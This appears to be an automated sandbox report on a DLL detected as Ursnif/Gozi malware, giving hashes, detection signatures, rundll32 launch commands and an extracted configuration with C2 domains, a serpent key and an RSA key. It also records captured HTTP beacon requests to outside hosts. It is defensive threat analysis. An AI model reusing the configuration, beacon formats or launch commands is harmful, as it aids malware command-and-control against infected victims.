Windows Analysis Report 616412739e268.dll

Overview

General Information

Sample Name: 616412739e268.dll
Analysis ID: 500413
MD5: 9e67e68ddbedba865b91b5469ab642ef
SHA1: f2c7b0735343081be06e48616d0fc14235a28744
SHA256: 41c0934ba1be030dbae45893107f6a2ae5f99c79d7634626263cdf809f7556ee
Tags: brt, dll, gozi, isfb, ursnif

Detection

Ursnif
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Writes or reads registry keys via WMI
Writes registry values via WMI
Uses 32bit PE files
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7088 cmdline: loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 5724 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4432 cmdline: rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6084 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6140 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 880 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6012 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 4700 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 628 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 4360 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 4880 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 848 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000002.00000003.636681449.000000000302F000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000006.00000003.533976694.0000000005BD8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000002.00000003.504323310.00000000033A8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
2.2.loaddll32.exe.2d494a0.1.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
10.3.rundll32.exe.10ba31a.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
5.3.rundll32.exe.10da31a.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
6.3.rundll32.exe.318a31a.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
6.2.rundll32.exe.6e8d0000.2.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif (the extracted configuration is the one listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: 616412739e268.dll ReversingLabs: Detection: 24%
Source: 616412739e268.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: unknown HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.98.207.210:443 -> 192.168.2.3:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.101.60.226:443 -> 192.168.2.3:49783 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.98.207.210:443 -> 192.168.2.3:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.101.60.226:443 -> 192.168.2.3:49821 version: TLS 1.2
Source: 616412739e268.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdbm source: WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.521737000.0000000000905000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb7 source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000012.00000003.512855279.0000000005701000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524487257.00000000050F4000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb.{Y@e source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.521724684.00000000008FF000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdbf{ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbl{ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb/ source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000012.00000003.512855279.0000000005701000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524487257.00000000050F4000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000012.00000002.529162256.0000000002F92000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000002.551332599.0000000000632000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: winspool.pdb6{1@ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb0{?@ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb({G@r source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb0 source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000016.00000003.516470114.0000000004CA2000.00000004.00000001.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000018.00000003.521724684.00000000008FF000.00000004.00000001.sdmp
                      Source: Binary string: mpr.pdbn source: WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbQ source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdbA source: WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb<{K@a source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb9 source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb[ source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000002.00000002.682655563.000000006E94B000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.683978405.000000006E94B000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.548616295.000000006E94B000.00000002.00020000.sdmp, 616412739e268.dll
                      Source: Binary string: msctf.pdb# source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb% source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000018.00000003.521770649.000000000090B000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000018.00000003.521737000.0000000000905000.00000004.00000001.sdmp
                      Source: Binary string: sfc.pdbm source: WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: msctf.pdb"{M@C source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: www.msn.com
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: areuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 40.97.161.50 187
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: breuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 52.98.207.210 187
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 40.101.60.226 187
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: outlook.office365.com
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: msn.com
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: www.outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 13.82.28.61 187
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View IP Address: 40.97.161.50 40.97.161.50
Source: Joe Sandbox View IP Address: 13.82.28.61 13.82.28.61
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBXvAEYkPgeGA_/2By9PpRoLgfve_2F/vhfdT7HCV506AwB/36mBvSW_2FRJGuHNuA/yE6OJX0fi/uPoeQfh7fRd0REpiPmsf/t9myfegLaxJw_2B8ay_/2FKKbEnJu_2BUYEu1pJNUs/ydzaPjLRj/fW1.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7CtgIlmwdVETSdZ_2B/b8UUaR4yA5m9yE7vka1/Gh0JtvuATrVobNbwlsuYfN/IReexc6mib3Oj/OUfheoEg/Oot_2BsNxyrozYIcd4Px1xV/TZHusM6SVs/2zs_2FZfacHwT9roF/sfywcfJ4/Yw.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
